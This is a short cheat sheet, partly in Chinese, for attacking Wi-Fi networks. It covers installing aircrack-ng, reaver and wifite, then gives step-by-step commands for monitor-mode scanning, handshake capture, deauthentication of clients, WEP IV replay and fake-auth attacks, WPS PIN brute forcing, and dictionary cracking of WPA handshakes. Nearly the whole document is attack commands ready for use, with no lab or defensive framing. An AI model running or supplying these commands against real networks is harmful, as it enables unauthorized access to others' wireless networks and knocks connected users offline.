aircrack-ng

CentOS

$ sudo yum install "openssl-devel" "libnl3-devel" "iw" "ethtool" "pciutils" "tshark" "pyrit" "cowpatty"

Debian

$ sudo apt-get install "libssl-dev" "libnl-3-dev" "libnl-genl-3-dev" "iw" "ethtool" "tshark" "pyrit" "cowpatty"

http://aircrack-ng.org/

$ wget -c "http://download.aircrack-ng.org/aircrack-ng-1.2-rc3.tar.gz"
$ tar zxf "aircrack-ng-1.2-rc3.tar.gz"
$ cd "aircrack-ng-1.2-rc3"
$ make
$ sudo make install
$ cd ".."
$ sudo airodump-ng-oui-update

reaver

CentOS

$ sudo yum install "libpcap-devel" "sqlite-devel"

Debian

$ sudo apt-get install "libpcap-dev" "libsqlite3-dev"

https://code.google.com/p/reaver-wps/

$ wget -c "http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"
$ tar zxf "reaver-1.4.tar.gz"
$ cd "reaver-1.4/src"
$ ./configure
$ make
$ sudo make install
$ cd "../.."

wifite

https://github.com/derv82/wifite/

$ wget -c "https://github.com/derv82/wifite/raw/master/wifite.py"
$ chmod +x "wifite.py"
$ sudo mv "wifite.py" "/usr/local/bin/wifite"

Scanning

扫描并仅显示开启 WPS 的 AP

$ wifite -wps

扫描仅以 WEP 模式加密的 AP

$ wifite -wep

指定字典文件

$ wifite -dict "/root/w/china_super_wpa_wordlist.txt"

列出网卡

$ airmon-ng

使网卡 wlan0 进入监视模式

$ airmon-ng start wlan0

列出 AP 列表

$ airodump-ng mon0

捕捉信号包

$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0
$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0 --ivs

Attacking

发送 deauth 信号

$ aireplay-ng -0 5 -a BSSID -c CLIENT_MAC mon0
$ aireplay-ng -3 -a BSSID -c CLIENT_MAC mon0

IVs 欺骗

$ aireplay-ng -c 6 -1 0 -a "00:21:27:22:4c:2e" -h "00:1a:ef:0a:8e:bc" mon0
$ aireplay-ng -c 6 -2 -F -p 0841 -c "ff:ff:ff:ff:ff:ff" -b "00:21:27:22:4C:2E" -h "00:1a:ef:0a:8e:bc" mon0

aireplay-ng 工具攻击模式

$ Attack modes (numbers can still be used):
--deauth      count : deauthenticate 1 or all stations (-0)
--fakeauth    delay : fake authentication with AP (-1)
--interactive       : interactive frame selection (-2)
--arpreplay         : standard ARP-request replay (-3)
--chopchop          : decrypt/chopchop WEP packet (-4)
--fragment          : generates valid keystream   (-5)
--caffe-latte       : query a client for new IVs  (-6)
--cfrag             : fragments against a client  (-7)
--migmode           : attacks WPA migration mode  (-8)
--test              : tests injection and quality (-9)

Cracking

字典破解 WPA 握手包

$ aircrack-ng -w WORDLIST -b BSSID -e ESSID HANSHAKE

PIN 码暴力破解

$ reaver -i mon0 -b BSSID -c CHANNEL -v -S -a -d 0 -t 10 -s /media/VM/crack/ESSID.wpc -p PIN

WPA 握手包字典破解

"D:\aircrack-ng\bin\aircrack-ng.exe" -w "/cygdrive/h/Temp/Crack/w/china_super_wpa_wordlist.txt" -e "ESSID" -b "BSSID" "/cygdrive/h/Temp/Crack/cap/ESSID.cap"